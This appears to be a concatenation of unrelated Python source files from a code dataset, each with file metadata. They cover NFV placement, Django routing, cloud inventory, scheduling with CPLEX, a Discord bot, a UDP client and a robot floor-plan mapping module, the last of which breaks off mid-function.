this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nNeither the name of the SONATA-NFV [, ANY ADDITIONAL AFFILIATION]\nnor the names of its contributors may be used to endorse or promote\nproducts derived from this software without specific prior written\npermission.\n\nThis work has been performed in the framework of the SONATA project,\nfunded by the European Commission under Grant number 671517 through\nthe Horizon 2020 and 5G-PPP programmes. The authors would like to\nacknowledge the contributions of their colleagues of the SONATA\npartner consortium (www.sonata-nfv.eu).\n\"\"\"\n\nimport logging\nimport yaml\nfrom sonsmbase.smbase import sonSMbase\n\nlogging.basicConfig(level=logging.INFO)\nLOG = logging.getLogger(\"ssm-placement-1\")\nLOG.setLevel(logging.DEBUG)\nlogging.getLogger(\"son-mano-base:messaging\").setLevel(logging.DEBUG)\n\n\nclass PlacementSSM(sonSMbase):\n def __init__(self):\n\n self.smtype = 'ssm'\n self.sfname = 'default'\n self.name = 'placement'\n self.id = '1'\n self.version = 'v0.1'\n self.description = 'Placement SSM'\n\n super(self.__class__, self).__init__(smtype= self.smtype,\n sfname= self.sfname,\n name= self.name,\n id = self.id,\n version= self.version,\n description= self.description)\n\n def on_registration_ok(self):\n LOG.debug(\"Received registration ok event.\")\n\n # Register to task topic and to place topic\n topic = 'placement.ssm' + self.uuid\n\n self.manoconn.subscribe(self.on_place,topic= topic)\n\n LOG.info(\"Subscribed to \" + str(topic))\n\n def on_place(self, ch, method, properties, payload):\n \"\"\"\n This method organises the placement calculation, and\n provides the response for the SLM.\n \"\"\"\n\n LOG.info(\"Placement started\")\n message = yaml.load(payload)\n topology = message['topology']\n nsd = message['nsd']\n functions = message['vnfds']\n\n mapping = self.placement_alg(nsd, functions, topology)\n\n if mapping is None:\n LOG.info(\"The mapping calculation has failed.\")\n message = {}\n message['error'] = 'Unable to perform placement.'\n message['status'] = 'ERROR'\n \n else:\n LOG.info(\"The mapping calculation has succeeded.\")\n message = {}\n message['error'] = None\n message['status'] = \"COMPLETED\"\n message['mapping'] = mapping\n\n is_dict = isinstance(message, dict)\n LOG.info(\"Type Dict: \" + str(is_dict))\n\n payload = yaml.dump(message)\n self.manoconn.notify('placement.ssm' + self.uuid,\n payload,\n correlation_id=properties.correlation_id)\n\n return\n\n def placement_alg(self, nsd, functions, topology):\n \"\"\"\n This is the default placement algorithm that is used if the SLM\n is responsible to perform the placement\n \"\"\"\n LOG.info(\"Mapping algorithm started.\")\n mapping = {}\n\n for vnfd in functions:\n needed_cpu = vnfd['virtual_deployment_units'][0]['resource_requirements']['cpu']['vcpus']\n needed_mem = vnfd['virtual_deployment_units'][0]['resource_requirements']['memory']['size']\n needed_sto = vnfd['virtual_deployment_units'][0]['resource_requirements']['storage']['size']\n\n for vim in topology:\n cpu_req = needed_cpu <= (vim['core_total'] - vim['core_used'])\n mem_req = needed_mem <= (vim['memory_total'] - vim['memory_used'])\n\n if cpu_req and mem_req:\n print('VNF ' + vnfd['instance_uuid'] + ' mapped on VIM ' + vim['vim_uuid'])\n mapping[vnfd['instance_uuid']] = {}\n mapping[vnfd['instance_uuid']]['vim'] = vim['vim_uuid']\n vim['core_used'] = vim['core_used'] + needed_cpu\n vim['memory_used'] = vim['memory_used'] + needed_mem\n break\n \n # Check if all VNFs have been mapped\n if len(mapping.keys()) == len(functions):\n LOG.info(\"Mapping succeeded: \" + str(mapping))\n return mapping\n else:\n return None\n\ndef main():\n PlacementSSM()\n\nif __name__ == '__main__':\n main()\n","sub_path":"softnetworking/ssms/ssms/placement/placement/placement.py","file_name":"placement.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"98674582","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.category, name='category'),\n path('detail//', views.lecture_detail_page, name='detail'), #lecture_detail\n path('result/', views.select_lecture, name='categoryresult'),\n# path(')\n\n# path('url')\n]\n\n","sub_path":"categories/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"97503928","text":"import os\r\nimport sys\r\n\r\nlogs = \"../mmwave_logs/\"\r\n\r\nif \"-p\"in sys.argv:\r\n\tlogs=str(sys.argv[sys.argv.index(\"-p\")+1])\r\n\r\ndl = logs+\"/Complete/DL/\"\r\nul = logs+\"/Complete/UL/\"\r\n\r\nfor filename in os.listdir(dl):\r\n tmpname = dl+filename+\"_tmp.txt\"\r\n tmpfile = open(tmpname,\"w+\")\r\n targfile = dl+filename\r\n\r\n with open(targfile,\"r\") as file:\r\n for row in file:\r\n tmpfile.write(row.replace('\"','').replace(\"'\",\"\"))\r\n\r\n os.system(\"rm '\"+targfile+\"'\")\r\n os.system(\"mv '\"+tmpname+\"' '\"+targfile+\"'\")\r\n\r\nfor filename in os.listdir(ul):\r\n tmpname = ul+filename+\"_tmp.txt\"\r\n tmpfile = open(tmpname,\"w+\")\r\n targfile = ul+filename\r\n\r\n with open(targfile,\"r\") as file:\r\n for row in file:\r\n tmpfile.write(row.replace('\"','').replace(\"'\",\"\"))\r\n\r\n os.system(\"rm '\"+targfile+\"'\")\r\n os.system(\"mv '\"+tmpname+\"' '\"+targfile+\"'\")","sub_path":"scripts/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"506443664","text":"import csv\nfrom lookup import Lookup\n\ndef process_csv(filename):\n\n with open(filename, 'r') as input_file:\n input = csv.reader(input_file)\n results = []\n\n lookup = Lookup()\n\n for row in input:\n results.append(lookup.find_by_vowelless_hebrew_and_english(row[0].strip(), row[1].strip()))\n\n output = [(word.word_vowelless, word.word, word.meaning) for word in results if word is not None]\n\n with open('card_output.csv', 'w') as output_file:\n writer = csv.writer(output_file)\n writer.writerows(output)\n\ndef test():\n process_csv('input.csv')\n\nif __name__ == '__main__':\n test()","sub_path":"process_csv.py","file_name":"process_csv.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"222320324","text":"from tkinter import *\n\nwindow = Tk()\nwindow.title(\"Mean Cruncher\")\nwindow.geometry(\"800x400\")\n\nentries = [ ]\nfor i in range(5):\n entries.append(Entry(window))\n entries[i].place(x=10, y=10+(20*i))\n\nwindow.mainloop()\n","sub_path":"interface/makingEntries.py","file_name":"makingEntries.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"363481981","text":"import pytest\nfrom selenium import webdriver\n\n\nHEADLESS = False\nBASE_WEBDRIVER = webdriver.PhantomJS if HEADLESS else webdriver.Chrome\nHOST_ADDRESS = 'http://localhost:8080/'\n\n\nclass BaseBrowser(BASE_WEBDRIVER):\n def __init__(self, host_address, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.implicitly_wait(15)\n self.set_page_load_timeout(15)\n self.set_window_size(1024, 768)\n self.get(host_address)\n\n @property\n def body_text(self):\n return self.find_element_by_tag_name('body').text\n\n def clear_local_storage(self):\n self.execute_script('localStorage.clear()')\n self.refresh()\n\n\ndef setup_browser_fixture(BrowserClass):\n def browser():\n _browser = BrowserClass(host_address=HOST_ADDRESS)\n yield _browser\n _browser.clear_local_storage()\n _browser.quit()\n return pytest.fixture(browser)\n","sub_path":"integration_tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"376732865","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\nfrom pyuvdata import UVData\nfrom uvtools import plot\n\nif __name__ == \"__main__\":\n plt.ion()\n \n # Load the sample data.\n this_dir = Path(__file__).parent\n test_file = list(this_dir.glob(\"*.uvh5\"))[0]\n uvd = UVData()\n uvd.read(test_file)\n\n # Check that making a plot works.\n freqs = np.unique(uvd.freq_array)\n fselect = (freqs > 110e6) & (freqs < 190e6)\n uvd.select(frequencies=freqs[fselect])\n antpairpol = uvd.get_antpairpols()[0]\n fig, ax = plot.labeled_waterfall(uvd, antpairpol=antpairpol)\n plt.pause(5)\n plt.close()\n","sub_path":"Lessons/HERADataPartI/test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"8513100","text":"coin = 0\nday = int(input(\"请输入天数\"))\ncur = 0\ntotal = 0\n\nwhile cur + coin + 1 <= day:\n coin += 1\n total += coin * coin\n cur += coin\n\ntotal += (day - cur) * (coin+1)\n\nprint(total)\n\n\n\n#cur = 0\ntotal = 0\ncoin = 1\ncounter = 0\nfor i in range(day):\n total += coin\n counter += 1\n if counter == coin:\n counter = 0\n coin += 1\n\nprint(total)\n\na = (0,1,4)\nprint(max(a))\n\n\n#","sub_path":"PythonFunnyProgram/00.classic/exercise/king_coin.py","file_name":"king_coin.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"174734309","text":"#!/Users/ssi/yc_dynamic_inventory/bin/python\nimport json\nimport os\n\nimport yaml\nimport yandexcloud\nfrom yaml import Loader\nfrom yandex.cloud.compute.v1.instance_service_pb2 import ListInstancesRequest\nfrom yandex.cloud.compute.v1.instance_service_pb2_grpc import InstanceServiceStub\n\n\ndef find_by_labels(instances, labels):\n if len(labels) == 0:\n return instances\n\n res = []\n for inst in instances:\n for k, v in labels.items():\n lbls = v\n if isinstance(v, str):\n lbls = [v]\n if k in inst.labels and any(inst.labels[k] == lbl for lbl in lbls):\n res.append(inst)\n return res\n\n\nclass ConfigIsNotExists(Exception):\n def __init__(self, msg, find_paths, config_name):\n super().__init__(msg)\n self.find_paths = find_paths\n self.config_name = config_name\n\n\nclass ValidationError(Exception):\n pass\n\n\nclass ConfigFinder:\n DEFAULT_PATHS = (\n './',\n '~/.yandex_cloud',\n )\n\n CONFIG_NAME = 'config.yaml'\n\n @classmethod\n def __get_path(cls):\n for path in cls.DEFAULT_PATHS:\n found_path = os.path.join(path, cls.CONFIG_NAME)\n if not os.path.exists(found_path):\n continue\n return found_path\n raise ConfigIsNotExists(\"Config wasn't found\", cls.DEFAULT_PATHS, cls.CONFIG_NAME)\n\n @classmethod\n def stream(cls):\n config_path = cls.__get_path()\n with open(config_path) as f:\n stream = f.read()\n return stream\n\n\nclass ServiceAccount(dict):\n def __init__(self, path=None, stream=None):\n if path is not None and stream is not None:\n raise ValueError(\"Parameter conflict: only one of `path` or `stream` must be set.\")\n if path is None and stream is None:\n raise ValueError(\"Parameter error: one of `path` or `stream` must be set.\")\n if path is not None:\n with open(path) as f:\n stream = f.read()\n self.__parsed_data = self._set_from_stream(stream)\n\n def __getitem__(self, item):\n return self.__parsed_data[item]\n\n @classmethod\n def _set_from_stream(cls, stream):\n # TODO: validate?\n return json.loads(stream)\n\n def get(self, k):\n return self.__parsed_data.get(k)\n\n\nclass Config:\n _FINDER = ConfigFinder\n _SERVICE_ACCOUNT = ServiceAccount\n\n _REQUIRED_FIELDS = (\n 'folderId',\n 'keyFile',\n 'tags',\n )\n\n def __init__(self):\n self._finder_instance = self._FINDER()\n self.__stream = self._finder_instance.stream()\n self.__parsed_config = yaml.load(self.__stream, Loader=Loader)\n\n self._service_account = None\n\n self._validate()\n\n def __getitem__(self, item):\n return self.__parsed_config.get(item)\n\n def _validate(self):\n try:\n self._check_required_field()\n except KeyError as k:\n raise ValidationError(\"Key %s is required.\" % k)\n if not self._is_sa_key_file_exist():\n raise ValidationError(\n \"Service Account credentials was not found. Path: %s\" % self.__parsed_config['keyFile']\n )\n\n def _check_required_field(self):\n _ = all(key in self.__parsed_config for key in self._REQUIRED_FIELDS)\n\n def _is_sa_key_file_exist(self):\n return os.path.exists(self.__parsed_config['keyFile'])\n\n @property\n def service_account(self):\n if self._service_account is None:\n self._service_account = self._SERVICE_ACCOUNT(self.__parsed_config['keyFile'])\n return self._service_account\n\n\nconfig = Config()\n\n\ndef generate_inventory(conf):\n sdk = yandexcloud.SDK(service_account_key=conf.service_account)\n\n c = sdk.client(InstanceServiceStub)\n\n l = c.List(ListInstancesRequest(\n folder_id=conf['folderId']\n ))\n\n tags = [k for k in conf['tags'].keys()]\n\n tag_hosts_map = {\n tag: [\n i.network_interfaces[0].primary_v4_address.one_to_one_nat.address for i in find_by_labels(\n l.instances, {'tags': [tag]}\n )\n ] for tag in conf['tags'].keys()\n }\n\n def set_host_as_value(var_hosts):\n if isinstance(var_hosts, list):\n return [set_host_as_value(host) for host in var_hosts]\n if any(var_hosts == tag_name for tag_name in tags):\n return tag_hosts_map[var_hosts]\n if var_hosts.find('[') != -1 and var_hosts.find(']') == len(var_hosts) - 1:\n tag_name, index = var_hosts.split('[')\n index = int(index[:-1])\n if len(tag_hosts_map[tag_name]) <= index:\n # FIXME: it seems like an error in the config\n return []\n return tag_hosts_map[tag_name][index]\n\n def extract_var(var):\n if 'value' in var:\n return var['value']\n return set_host_as_value(var['hosts'])\n\n # extract vars\n tag_host_vars_map = {}\n for tag in tags:\n if 'vars' not in config['tags'][tag] or config['tags'][tag]['vars'] is None:\n continue\n tag_host_vars_map[tag] = {\n var_name: extract_var(config['tags'][tag]['vars'][var_name]) for var_name in config['tags'][tag]['vars']\n }\n\n result_inventory = {}\n for tag, hosts in tag_hosts_map.items():\n hosts_name = tag\n if 'hostsName' in config['tags'][tag]:\n hosts_name = config['tags'][tag]['hostsName']\n result_inventory[hosts_name] = {\n 'hosts': hosts\n }\n if tag in tag_host_vars_map:\n result_inventory[hosts_name]['vars'] = tag_host_vars_map[tag]\n return result_inventory\n\n\ninventory = generate_inventory(config)\n\nprint(json.dumps(inventory))\n","sub_path":"yc_inventory.py","file_name":"yc_inventory.py","file_ext":"py","file_size_in_byte":5718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"176750636","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 5 17:22:02 2020\n\n@author: hoale\n\"\"\"\n\n\"\"\"\nThis file contains CP solver based on DOCPLEX IBM\n\"\"\"\n\n\"\"\" IBM CPLEX \"\"\"\nfrom docplex.cp.model import CpoModel, start_of, end_of, size_of\n\n\"\"\" Creation of CP model with constraints (subproblem 2) \"\"\"\ndef _create_cp_model(all_jobs, job_ids, job_num, all_machines, r_times, d_times, p_intervals, assign):\n \"\"\" Prepare the index for decision variables \"\"\"\n # typle of jobs, form (job_0, job_1, ...)\n jobs = tuple(job_ids)\n \n \"\"\" Parameters model (dictionary) \"\"\"\n # 1. release time\n release_time = dict(zip(jobs, tuple(r_times)))\n # 2. due time\n due_time = dict(zip(jobs, tuple(d_times)))\n # 3. processing time\n process_time = dict(zip(jobs, tuple(p_intervals)))\n \n \"\"\" Creation of the CP model container \"\"\"\n cp_model = CpoModel(name=\"CP-Model\")\n \n \"\"\" Creation of variables \"\"\"\n # for j_id in all_jobs:\n # for m_id in all_machines:\n # if assign[(j_id, m_id)].x == 1:\n # print(assign[(j_id, m_id)])\n # 1. Variable subscript z_i represents machine selected to process job i\n z = {j_id: m_id for j_id in all_jobs for m_id in all_machines if assign[(j_id, m_id)].x == 1}\n # print(\"z: \", z)\n\n \"\"\" DOCPLEX \"\"\"\n # 1. list of interval variable, is a list of start time of jobs (i.start in CP model) \n start_time_cp = [cp_model.interval_var(size=process_time[j_id][z[j_id]], \n name=\"start-time-J{}\".format(j_id)) for j_id in all_jobs]\n # if assign[(j_id, z[j_id])].x == 1]\n \n \"\"\" Create constraints \"\"\"\n # 1. job release time constraint\n cp_model.add(start_of(start_time_cp[i]) >= release_time[i] for i in jobs)\n \n # 2. job due time constraint\n cp_model.add(start_of(start_time_cp[i]) <= due_time[i] - process_time[i][z[i]] for i in jobs)\n\n # 3. duration of processing one job constraint\n cp_model.add(size_of(start_time_cp[i]) == process_time[i][z[i]] for i in jobs)\n \n # 4. assignment of a job to a specific machine as well as sequence of jobs assigned to same machine\n # \"requires\" in OPL construct\n # job i requires unary resource corresponding to machine which was assigned from MILP\n # force no overlap for jobs \n # Constrain jobs to no overlap on each machine\n # Force no overlap for jobs executed on a same machine\n # disjunctive resource (unary resource): end(J1) <= start(J2) ||end(J2) <= start(J1)\n for job_id1 in range(job_num - 1):\n for job_id2 in range(job_id1 + 1, job_num):\n # print(\"job id1 & job id2\", job_id1, job_id2)\n if z[job_id1] == z[job_id2]:\n cp_model.add(cp_model.logical_or(\n end_of(start_time_cp[job_id1]) <= start_of(start_time_cp[job_id2]), \n end_of(start_time_cp[job_id2]) <= start_of(start_time_cp[job_id1])))\n\n return cp_model, start_time_cp","sub_path":"hybrid/hybrid_cp_solver.py","file_name":"hybrid_cp_solver.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"59973061","text":"#!/usr/bin/env python3\nimport logging\nimport z3\n\nfrom modelLang import parsers, backends\n\nfrom modelLang.parsers import Parser\nfrom modelLang.backends import Z3Backend\n\nfrom pwnlib.util.packing import unpack\n\nclass NegativeCombinationTest():\n testfile1 = \"tests/functional/mod1.lmod\"\n testfile2 = \"tests/functional/mod2.lmod\"\n\n @staticmethod\n def run():\n parser1 = Parser()\n parser1.parse_file(NegativeCombinationTest.testfile1)\n\n backend1 = Z3Backend(name=NegativeCombinationTest.testfile1,\n voi=\"variable\")\n backend1.log.setLevel(logging.ERROR)\n backend1.exec_statements(parser1.statements)\n\n parser2 = Parser()\n parser2.parse_file(NegativeCombinationTest.testfile2)\n\n backend2 = Z3Backend(name=NegativeCombinationTest.testfile2,\n voi=\"variable\")\n backend2.log.setLevel(logging.ERROR)\n backend2.exec_statements(parser2.statements)\n\n backend = backend1 & ~backend2\n backend.log.setLevel(logging.ERROR)\n solver = backend.solver\n model = backend.model\n\n assert model, \"Model unsat. Test failed\"\n\n testcase = backend.generate_testcase(\"variable\")\n testcase = unpack(testcase, 'all')\n assert(testcase > 15)\n assert(testcase & 0xffff == 0)\n assert((testcase & (testcase - 1) == 0))\n return True\n\nif __name__ == \"__main__\":\n NegativeCombinationTest.run()\n","sub_path":"tests/functional/negativecombo.py","file_name":"negativecombo.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"322551282","text":"import discord\n\n\n\n\nprefix = '&'\n\nasync def hbt(message):\n\n\tawait message.reply(\"If you are interested in creating some homebrew, just ask your DM! In most cases, they'll work with you to create something that will add to your game experience. Make sure to take a peak at the templates using &template (whatever you're creating)! If the template doesn't exist, don't worry. Just ask your DM for some help.\")\n\nasync def templates(message):\n\n\tcommand = message.content[len(prefix):].split(' ')\n\n\tparameters = command[1:]\n\n\tcommand = command[0]\n\n\ttry:\n\n\t\tif parameters[0].lower() == 'spell':\n\n\t\t\tembed = discord.Embed(name = \"Spell Template\", description = \"What does your spell do?\", color = 0x4f094e)\n\n\t\t\tembed.add_field(name = \"At Higher Levels\", value = \"What does your spell do when cast at a higher level?\", inline = False)\n\n\t\t\tembed.add_field(name = \"Level\", value = \"What is the base level of your spell?\", inline = True)\n\n\t\t\tembed.add_field(name = \"School\", value = \"What school of magic does your spell belong to?\", inline = True)\n\n\t\t\tembed.add_field(name = \"Casting Time\", value = \"How long does it take to cast your spell?\", inline = True)\n\n\t\t\tembed.add_field(name = \"Range\", value = \"What is the range (n feet) of your spell?\", inline = True)\n\n\t\t\tembed.add_field(name = \"Components\", value = \"What are the required components of your spell?\", inline = True)\n\n\t\t\tembed.add_field(name = \"Duration\", value = \"How long does your spell last?\", inline = True)\n\n\t\t\tembed.set_footer(text = \"You DM does this part!\")\n\n\t\t\tawait message.reply(embed = embed)\n\n\n\n\n\t\telse:\n\n\t\t\tawait message.reply(\"Looks like you either made a spelling error, or the template doesn't exist.\")\n\n\texcept IndexError:\n\n\t\tawait message.reply('Try the command again with the template you wish to see!')\n","sub_path":"hbt.py","file_name":"hbt.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"159177201","text":"class Solution:\n\n #ac first solution\n def findMinArrowShots(self, points):\n \"\"\"\n :type points: List[List[int]]\n :rtype: int\n \"\"\"\n if not points or len(points) == 0:\n return 0\n points = sorted(points, key = lambda x: (x[0], x[1]))\n terminal = points[0][1]\n res = 1\n for i in range(1, len(points)):\n if terminal < points[i][0]:\n res += 1\n terminal = points[i][1]\n else:\n terminal = min(points[i][1], terminal)\n return res\n\n #second solution\n def findMinArrowShotsV2(self, points):\n \"\"\"\n :type points: List[List[int]]\n :rtype: int\n \"\"\"\n if not points or len(points) == 0:\n return 0\n points = sorted(points, key = lambda x : x[1])\n res, end = 0, float('-inf')\n for point in points:\n if point[0] > end:\n res += 1\n end = point[1]\n return res\n\n\n\nif __name__ == '__main__':\n input = [[10,16], [2,8], [1,6], [7,12]]\n print(Solution().findMinArrowShotsV2(input))\n\n\n","sub_path":"452MinimumNumberOfArrowsToBurstBalloons/452MinimumNumberOfArrowsToBurstBalloons.py","file_name":"452MinimumNumberOfArrowsToBurstBalloons.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"376991592","text":"from setuptools import setup, find_packages\n\nwith open('README.rst',encoding='UTF-8') as r:\n readme = r.read()\n\nsetup(\n name='pgbackup',\n version='0.1.0',\n description='Database backups locally or to AWS S3.',\n long_description = readme,\n author = 'Warren',\n author_email = 'warren.argus@curtin.edu.au',\n install_requires=['boto3'],\n packages=find_packages('src'),\n package_dir={'':'src'}, #this is a legacy thing that we do because of the above line\n entry_points={\n 'console_scripts': [\n 'pgbackup=pgbackup.cli:main',\n ]\n }\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"546979015","text":"import socket\nimport sys\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nprint(\"Socket client created successfully!\")\n\nhost = 'localhost'\nport = 5433\nmessage = \"Hello, server.\"\n\ntry:\n\tprint(\"Client: {}\".format(message))\n\ts.sendto(message.encode(), (host,5432))\n\n\tdata, server = s.recvfrom(4096)\n\tdata = data.decode()\n\tprint(\"Sent to server: {}\".format(data))\nfinally:\n\tprint(\"Client: Closing the connection\")\n\ts.close()","sub_path":"DIO - Python/Python-Seguranca-da-Informacao-DIO/Clientes e Servidor/clienteudp.py","file_name":"clienteudp.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"229357853","text":"import os\n\nfrom foca.foca import foca\n\nfrom cloud_registry.ga4gh.registry.service_info import RegisterServiceInfo\n\n\ndef main():\n # create app object\n app = foca(\n os.path.join(\n os.path.dirname(__file__),\n \"config.yaml\",\n )\n )\n\n # register service info\n with app.app.app_context():\n service_info = RegisterServiceInfo()\n service_info.set_service_info_from_config()\n\n # start app\n app.run(port=app.port)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"cloud_registry/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"409959006","text":"\nimport time\nimport os, shutil\nimport imutils\n\nimport numpy as np\nimport json\nimport _pickle as pickle\nimport cv2\n#from pyrecord import Record\n#from skimage.morphology import skeletonize\n\nfrom marvinglobal import marvinglobal as mg\n\nimport config\nimport marker\nimport navManager\n\n\nMM_PER_MAP_PIXEL = 20 # each pixel in the map represents a 20x20 mm square\nMAP_HEIGHT = 1000\nMAP_WIDTH = 1000\nCART_RADIUS_MM = 340 # cart representation as circle in the map, footprint of robot\ncartRadiusPix = int(CART_RADIUS_MM / MM_PER_MAP_PIXEL)\n\nCART_WIDTH_MAP = round(440 / MM_PER_MAP_PIXEL)\nCART_LENGTH_MAP = round(600 / MM_PER_MAP_PIXEL)\n\nSCAN_LOCATION_MARKER_SHADE = 150\n\n\n\n\ndef clearFloorPlan():\n\n config.floorPlan = np.zeros((MAP_HEIGHT, MAP_WIDTH), dtype=np.uint8)\n config.floorPlanFat = np.zeros_like(config.floorPlan)\n\n config.room = \"unknown\"\n config.fullScanDone = False\n saveMapInfo()\n\n config.scanLocations = []\n saveScanLocations()\n\n config.markerList = []\n saveMarkerList()\n\n\ndef loadFloorPlan(room):\n \"\"\"\n try to load the floor plan of the last used room\n \"\"\"\n filePath = f\"{config.PATH_ROOM_DATA}/{room}/floorPlan/floorPlan.jpg\"\n if os.path.isfile(filePath):\n config.floorPlan = cv2.imread(filePath, cv2.IMREAD_GRAYSCALE)\n if config.floorPlan is not None:\n config.floorPlanFat = cv2.imread(f\"{config.PATH_ROOM_DATA}/{room}/floorPlan/floorPlanFat.jpg\", cv2.IMREAD_GRAYSCALE)\n\n #cv2.imshow(\"floorPlanFat\", config.floorPlanFat)\n #cv2.waitKey(500)\n #cv2.destroyAllWindows()\n\n if config.floorPlan is None or config.floorPlanFat is None:\n # start with empty plans\n config.floorPlan = np.zeros((MAP_HEIGHT, MAP_WIDTH), dtype=np.uint8)\n config.floorPlanFat = np.zeros((MAP_HEIGHT, MAP_WIDTH), dtype=np.uint8)\n return False\n\n return True\n\n\ndef buildImageName(x, y, yaw=None, pitch=None):\n \"\"\"\n use rounded location and degrees values for imageName to limit number of stored images\n :return: ___\n \"\"\"\n nX = f\"{round(x / 100) * 100:+05d}\"\n nY = f\"{round(y / 100) * 100:+05d}\"\n ndegrees = f\"{round(yaw / 5) * 5:+04d}\" if yaw is not None else \"\"\n nPitch = f\"{pitch:+04d}\" if pitch is not None else \"\"\n return f\"{nX}{nY}{ndegrees}{nPitch}\"\n\n\ndef loadScanLocations():\n\n filename = f\"{config.PATH_ROOM_DATA}/{config.room}/scanLocations.json\"\n if os.path.isfile(filename):\n with open(filename, \"r\") as read_file:\n config.scanLocations = json.load(read_file)\n else:\n config.scanLocations = []\n\n\ndef saveScanLocations():\n\n filename = f\"{config.PATH_ROOM_DATA}/{config.room}/scanLocations.json\"\n with open(filename, \"w\") as write_file:\n json.dump(config.scanLocations, write_file, indent=2)\n\n\ndef saveMarkerList():\n\n \"\"\"filename = f\"{config.PATH_ROOM_DATA}/{config.room}/markerList.pickle\"\n with open(filename, \"wb\") as write_file:\n for m in config.markerList:\n pickle.dump(m, write_file)\n \"\"\"\n filename = f\"{config.PATH_ROOM_DATA}/{config.room}/markerList.json\"\n with open(filename, \"w\") as write_file:\n markers = []\n for m in config.markerList:\n markers.append(m.props())\n json.dump(markers, write_file, indent=2)\n\n\n\ndef loadMarkerList():\n\n \"\"\"filename = f\"{config.PATH_ROOM_DATA}/{config.room}/markerList.pickle\"\n if os.path.exists(filename):\n removeFile = False\n with open(filename, \"rb\") as read_file:\n while True: # each marker gets loaded separately\n try:\n thisMarker = pickle.load(read_file)\n config.markerList.append(thisMarker)\n config.log(f\"marker: {thisMarker}\")\n except EOFError:\n break\n except Exception as e:\n removeFile = True\n config.log(f\"error loading markers, remove file\")\n break\n if removeFile:\n os.remove(filename)\n \"\"\"\n filename = f\"{config.PATH_ROOM_DATA}/{config.room}/markerList.json\"\n if os.path.exists(filename):\n with open(filename, \"r\") as read_file:\n markers = json.load(read_file)\n\n for m in markers:\n oMarker = config.cMarker()\n oMarker.markerId = m['markerId']\n oMarker.cameraType = m['cameraType']\n oMarker.cartX = m['cartX']\n oMarker.cartY = m['cartY']\n oMarker.cartDegrees = m['cartDegrees'] # eyecam: head degrees, cartcam\n oMarker.camDegrees = m['camDegrees']\n oMarker.atAngleFromCart = m['atAngleFromCart']\n oMarker.distanceCamToMarker = m['distanceCamToMarker']\n oMarker.markerX = m['markerX']\n oMarker.markerY = m['markerY']\n oMarker.markerDegrees = m['markerDegrees']\n\n config.markerList.append(oMarker)\n config.log(f\"marker: {m}\")\n\n\ndef evalMapLocation(cartX, cartY):\n return int((cartX / MM_PER_MAP_PIXEL) + MAP_WIDTH/2), int(MAP_HEIGHT/2 - (cartY / MM_PER_MAP_PIXEL))\n\n\ndef addScanLocation():\n \"\"\"\n add the rounded cart position as scan location\n \"\"\"\n locX = round(config.oCart.getCartX() / 100) * 100\n locY = round(config.oCart.getCartY() / 100) * 100\n loc = (locX, locY)\n\n if not loc in config.scanLocations:\n config.scanLocations.append(loc)\n config.log(f\"new scan location added: {loc}\")\n\n saveScanLocations()\n\n\ndef takeHeadcamImage(show=False):\n\n config.headcamImage = rpcSend.getImage(inmoovGlobal.HEAD_CAM)\n if config.headcamImage is None:\n config.log(f\"WARNING: could not acquire headcam image\")\n return False\n\n if config.headcamImage is not None:\n config.flagProcessHeadcamImage = True\n\n if show:\n cv2.imshow(\"headcam\", config.headcamImage)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n return True\n\n\ndef takeEyecamImage(show=False):\n\n config.eyecamImage = rpcSend.getImage(inmoovGlobal.EYE_CAM)\n if config.eyecamImage is None:\n config.log(f\"WARNING: could not acquire eyecam image\")\n return False\n\n if config.eyecamImage is not None:\n config.flagProcessEyecamImage = 